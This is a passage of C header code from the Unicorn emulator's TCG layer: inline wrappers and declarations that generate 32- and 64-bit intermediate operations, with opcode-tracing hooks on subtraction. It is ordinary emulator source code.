a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5), tcgv_i32_arg(tcg_ctx, a6)); } static inline void tcg_gen_op6_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5, TCGv_i64 a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5), tcgv_i64_arg(tcg_ctx, a6)); } static inline void tcg_gen_op6i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGv_i32 a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5), a6); } static inline void tcg_gen_op6i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5), a6); } static inline void tcg_gen_op6ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGArg a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), a5, a6); } static inline void tcg_gen_op6ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGArg a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), a5, a6); } /* Generic ops. */ static inline void gen_set_label(TCGContext *tcg_ctx, TCGLabel *l) { l->present = 1; tcg_gen_op1(tcg_ctx, INDEX_op_set_label, label_arg(l)); } static inline void tcg_gen_br(TCGContext *tcg_ctx, TCGLabel *l) { l->refs++; tcg_gen_op1(tcg_ctx, INDEX_op_br, label_arg(l)); } void tcg_gen_mb(TCGContext *tcg_ctx, TCGBar); /* Helper calls. */ /* 32 bit ops */ void tcg_gen_addi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_subfi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2); void tcg_gen_subi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_andi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_ori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_xori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_shli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_shri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_sari_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_muli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_div_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rem_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_divu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_remu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_andc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_eqv_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_nand_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_nor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_orc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_clzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2); void tcg_gen_ctzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2); void tcg_gen_clrsb_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ctpop_i32(TCGContext *tcg_ctx, TCGv_i32 a1, TCGv_i32 a2); void tcg_gen_rotl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rotli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2); void tcg_gen_rotr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rotri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2); void tcg_gen_deposit_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2, unsigned int ofs, unsigned int len); void tcg_gen_deposit_z_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_sextract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract2_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 al, TCGv_i32 ah, unsigned int ofs); void tcg_gen_brcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, TCGv_i32 arg2, TCGLabel *); void tcg_gen_brcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, int32_t arg2, TCGLabel *); void tcg_gen_setcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_setcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_movcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 c1, TCGv_i32 c2, TCGv_i32 v1, TCGv_i32 v2); void tcg_gen_add2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh); void tcg_gen_sub2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh); void tcg_gen_mulu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_muls2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_mulsu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_ext8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_bswap16_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_bswap32_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_smin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_smax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_umin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_umax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_abs_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32); static inline void tcg_gen_discard_i32(TCGContext *tcg_ctx, TCGv_i32 arg) { tcg_gen_op1_i32(tcg_ctx, INDEX_op_discard, arg); } static inline void tcg_gen_mov_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (ret != arg) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_mov_i32, ret, arg); } } static inline void tcg_gen_movi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg) { tcg_gen_op2i_i32(tcg_ctx, INDEX_op_movi_i32, ret, arg); } static inline void tcg_gen_ld8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld8u_i32, ret, arg2, offset); } static inline void tcg_gen_ld8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld8s_i32, ret, arg2, offset); } static inline void tcg_gen_ld16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld16u_i32, ret, arg2, offset); } static inline void tcg_gen_ld16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld16s_i32, ret, arg2, offset); } static inline void tcg_gen_ld_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld_i32, ret, arg2, offset); } static inline void tcg_gen_st8_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st8_i32, arg1, arg2, offset); } static inline void tcg_gen_st16_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st16_i32, arg1, arg2, offset); } static inline void tcg_gen_st_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st_i32, arg1, arg2, offset); } static inline void tcg_gen_add_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_add_i32, ret, arg1, arg2); } static inline void tcg_gen_sub_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { uc_engine *uc = tcg_ctx->uc; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)arg1, (TCGv_i64)arg2, 32, uc, tcg_ctx->pc_start); } } } tcg_gen_op3_i32(tcg_ctx, INDEX_op_sub_i32, ret, arg1, arg2); } static inline void tcg_gen_and_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_and_i32, ret, arg1, arg2); } static inline void tcg_gen_or_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_or_i32, ret, arg1, arg2); } static inline void tcg_gen_xor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_xor_i32, ret, arg1, arg2); } static inline void tcg_gen_shl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_shl_i32, ret, arg1, arg2); } static inline void tcg_gen_shr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_shr_i32, ret, arg1, arg2); } static inline void tcg_gen_sar_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_sar_i32, ret, arg1, arg2); } static inline void tcg_gen_mul_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, ret, arg1, arg2); } static inline void tcg_gen_neg_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_neg_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_neg_i32, ret, arg); } else { tcg_gen_subfi_i32(tcg_ctx, ret, 0, arg); } } static inline void tcg_gen_not_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_not_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_not_i32, ret, arg); } else { tcg_gen_xori_i32(tcg_ctx, ret, arg, -1); } } /* 64 bit ops */ void tcg_gen_addi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_subfi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg1, TCGv_i64 arg2); void tcg_gen_subi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_andi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_ori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_xori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_shli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_shri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_sari_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_muli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_div_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rem_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_divu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_remu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_andc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_eqv_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_nand_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_nor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_orc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_clzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2); void tcg_gen_ctzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2); void tcg_gen_clrsb_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ctpop_i64(TCGContext *tcg_ctx, TCGv_i64 a1, TCGv_i64 a2); void tcg_gen_rotl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rotli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2); void tcg_gen_rotr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rotri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2); void tcg_gen_deposit_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2, unsigned int ofs, unsigned int len); void tcg_gen_deposit_z_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_sextract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract2_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 al, TCGv_i64 ah, unsigned int ofs); void tcg_gen_brcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2, TCGLabel *); void tcg_gen_brcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, int64_t arg2, TCGLabel *); void tcg_gen_setcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_setcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_movcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 c1, TCGv_i64 c2, TCGv_i64 v1, TCGv_i64 v2); void tcg_gen_add2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); void tcg_gen_sub2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); void tcg_gen_mulu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_muls2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_mulsu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_not_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap16_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap64_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_smin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_smax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_umin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_umax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_abs_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64); #if TCG_TARGET_REG_BITS == 64 static inline void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_gen_op1_i64(tcg_ctx, INDEX_op_discard, arg); } static inline void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { if (ret != arg) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_mov_i64, ret, arg); } } static inline void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg) { tcg_gen_op2i_i64(tcg_ctx, INDEX_op_movi_i64, ret, arg); } static inline void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld8u_i64, ret, arg2, offset); } static inline void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld8s_i64, ret, arg2, offset); } static inline void tcg_gen_ld16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld16u_i64, ret, arg2, offset); } static inline void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld16s_i64, ret, arg2, offset); } static inline void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld32u_i64, ret, arg2, offset); } static inline void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld32s_i64, ret, arg2, offset); } static inline void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld_i64, ret, arg2, offset); } static inline void tcg_gen_st8_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st8_i64, arg1, arg2, offset); } static inline void tcg_gen_st16_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st16_i64, arg1, arg2, offset); } static inline void tcg_gen_st32_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st32_i64, arg1, arg2, offset); } static inline void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st_i64, arg1, arg2, offset); } static inline void tcg_gen_add_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_add_i64, ret, arg1, arg2); } static inline void tcg_gen_sub_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { uc_engine *uc = tcg_ctx->uc; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { gen_uc_traceopcode(tcg_ctx, hook, arg1, arg2, 64, uc, tcg_ctx->pc_start); } } } tcg_gen_op3_i64(tcg_ctx, INDEX_op_sub_i64, ret, arg1, arg2); } static inline void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_and_i64, ret, arg1, arg2); } static inline void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_or_i64, ret, arg1, arg2); } static inline void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_xor_i64, ret, arg1, arg2); } static inline void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_shl_i64, ret, arg1, arg2); } static inline void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_shr_i64, ret, arg1, arg2); } static inline void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_sar_i64, ret, arg1, arg2); } static inline void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, ret, arg1, arg2); } #else /* TCG_TARGET_REG_BITS == 32 */ static inline void tcg_gen_st8_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st8_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_st16_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st16_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_st32_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_add_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_add2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2)); } static inline void tcg_gen_sub_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_sub2_i32(tcg_ctx, 